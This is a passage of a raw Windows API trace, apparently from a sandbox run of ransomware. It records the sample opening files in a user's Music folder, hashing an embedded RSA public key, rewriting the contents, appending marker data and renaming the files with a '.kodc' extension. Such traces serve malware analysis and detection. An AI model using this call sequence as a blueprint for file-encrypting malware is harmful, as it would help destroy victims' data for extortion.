lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.920] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5e32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.921] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.921] CloseHandle (hObject=0x5cc) returned 1 [0101.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0101.933] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\7d54.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\7d54.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\7d54.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\7d54.wav.kodc")) returned 1 [0101.935] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8db202f0, ftCreationTime.dwHighDateTime=0x1d5bbc6, ftLastAccessTime.dwLowDateTime=0x7d5ab20, ftLastAccessTime.dwHighDateTime=0x1d5c1e6, ftLastWriteTime.dwLowDateTime=0x7d5ab20, ftLastWriteTime.dwHighDateTime=0x1d5c1e6, nFileSizeHigh=0x0, nFileSizeLow=0x13125, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8yEpsB_ctagmhD.m4a", cAlternateFileName="8YEPSB~1.M4A")) returned 1 [0101.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.935] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\8yEpsB_ctagmhD.m4a") returned=".m4a" [0101.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\8yEpsB_ctagmhD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\8yepsb_ctagmhd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.935] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=78117) returned 1 [0101.935] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.939] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x130ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.939] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.940] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x13125, lpOverlapped=0x0) returned 1 [0101.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.941] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.941] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.942] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.942] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.942] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.943] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.943] GetLastError () returned 0x0 [0101.943] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.943] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.943] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.943] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.943] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x13130) returned 0x9bb8968 [0101.944] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6598 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81d8 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb65e0 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81f0 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.944] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8238 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8220 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.946] GetCurrentThreadId () returned 0x42c [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8c98 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.946] GetCurrentThreadId () returned 0x42c [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0101.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0101.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8250 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb65e0 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.950] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x13120, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x13120, lpOverlapped=0x0) returned 1 [0101.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0101.951] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13125, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.951] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 